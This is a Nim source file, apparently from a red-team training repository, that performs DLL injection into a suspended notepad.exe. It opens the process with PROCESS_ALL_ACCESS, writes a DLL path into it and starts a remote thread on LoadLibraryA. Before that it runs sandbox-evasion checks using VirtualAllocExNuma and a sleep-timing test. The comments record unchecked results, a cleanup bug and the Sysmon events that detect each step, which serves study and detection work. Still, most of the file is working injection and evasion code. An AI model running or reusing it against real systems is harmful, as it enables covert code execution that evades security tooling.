import winim/lean, std/osproc, std/times
# Flat demo script, kept byte-for-byte: it writes a DLL path into a freshly
# started notepad.exe and starts a remote thread on LoadLibraryA so the
# target loads that DLL. The comments below record what each call does,
# which results go unchecked, and which host telemetry the sequence leaves.
let
  # Absolute path to the DLL the remote thread will load. It is the author's
  # own machine path, is never checked for existence, and is copied into the
  # target process as a plain NUL-terminated C string (see the cast below).
  dll_path: LPCSTR = "C:\\Users\\svrat\\Documents\\Red-Team-Advent-of-Code\\18_DllInject\\create_file.dll";
when isMainModule:
  # Two environment checks run first. Both exit with quit(0) on failure, so
  # a harness sees a "successful" exit code whether or not they passed.
  echo "[+] Running sandbox evasion using the non-emulated API VirtualAllocExNuma";
  # Allocates 0x1000 bytes in this process using raw flag values
  # (0x3000 = MEM_COMMIT or MEM_RESERVE, 0x4 = PAGE_READWRITE — the same
  # values the named constants further down stand for), NUMA node 0.
  # The allocation is only used as a probe and is never freed.
  let mem = VirtualAllocExNuma(GetCurrentProcess(), NULL, 0x1000, 0x3000, 0x4, 0);
  if mem == nil:
    echo "[-] (VirtualAllocExNuma) Failed check"
    quit(0)
  echo "[+] Delay of three seconds for scan bypass check"
  # Takes a cpuTime() reading (std/times) on each side of a 3 s Sleep and
  # bails out if the two readings differ by less than 2.5 s.
  let time = cpuTime()
  Sleep(3000);
  let time_now = cpuTime()
  if time_now - time < 2.5:
    echo "[-] (Sleep) Failed check"
    quit(0)
  # Target: a new notepad.exe started through osproc and suspended before
  # any handle work. startProcess raises OSError if the binary cannot be
  # started; nothing here catches it. The process is never resumed,
  # terminated or closed afterwards.
  let injectedProc = startProcess("notepad.exe")
  injectedProc.suspend()
  echo "[*] Suspended process: ", injectedProc.processID
  # Opens the target with PROCESS_ALL_ACCESS. OpenProcess returns NULL on
  # failure; the handle is printed but never checked, and never closed.
  # Detection note: a cross-process open with this access mask is exactly
  # what Sysmon Event ID 10 (ProcessAccess) records, including the mask.
  let processHandle = OpenProcess(
    PROCESS_ALL_ACCESS,
    false,
    cast[DWORD](injectedProc.processID)
  )
  echo "[*] Injected proc handle: ", processHandle
  echo "[*] Allocating memory for dllpath in the target process"
  # Reserves a read/write buffer in the target sized for the path plus its
  # terminating NUL. VirtualAllocEx returns NULL on failure; not checked.
  let dllMemoryPath = VirtualAllocEx(
    processHandle,
    NULL,
    cast[SIZE_T](dll_path.len + 1),
    MEM_COMMIT,
    PAGE_READWRITE
  )
  var bytesWritten: SIZE_T
  # Copies the path string (clear text) into the target. The BOOL result is
  # printed but a failure does not stop the script from continuing.
  let writeProcess = WriteProcessMemory(
    processHandle,
    dllMemoryPath,
    cast[LPVOID](dll_path),
    cast[SIZE_T](dll_path.len + 1),
    addr bytesWritten
  )
  echo "[*] WriteProcessMemory: ", bool(writeProcess)
  echo " \\-- bytes written: ", bytesWritten
  echo ""
  # Resolves LoadLibraryA in *this* process and reuses the address in the
  # target; that only works if kernel32 is mapped at the same base in both
  # processes — assumed, not verified here. The trailing comment is a
  # leftover from an earlier argument list and has no effect.
  let load_dll_func = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "LoadLibraryA") #, dllMemoryPath, 0, 0)
  # Starts a thread in the target whose entry point is LoadLibraryA and
  # whose single argument is the remote buffer holding the DLL path.
  # Detection note: this is the step Sysmon Event ID 8 (CreateRemoteThread)
  # logs, with the start address resolving into kernel32!LoadLibraryA.
  # The returned handle is not checked for NULL and is never closed.
  let threadHandle = CreateRemoteThread(
    processHandle,
    NULL,
    0,
    cast[LPTHREAD_START_ROUTINE](load_dll_func),
    dllMemoryPath,
    0,
    NULL
  )
  echo "[+] Thread Handle: ", threadHandle
  # Blocks until the remote thread returns, i.e. until LoadLibraryA is done.
  # With a NULL thread handle this returns immediately with WAIT_FAILED.
  WaitForSingleObject(threadHandle, INFINITE);
  echo "[*] DLL loaded"
  echo "[!] Press enter to free memory and exit"
  discard stdin.readLine()
  # Cleanup bug, left as-is: the first argument is the *thread* handle, but
  # VirtualFreeEx expects the process handle, and MEM_RELEASE requires a
  # size of 0 rather than the buffer length. Either mistake makes the call
  # fail, and its result is discarded (presumably via winim's discardable
  # declaration — TODO confirm), so the remote buffer is never released.
  VirtualFreeEx(threadHandle, dllMemoryPath, len(dll_path) + 1, MEM_RELEASE);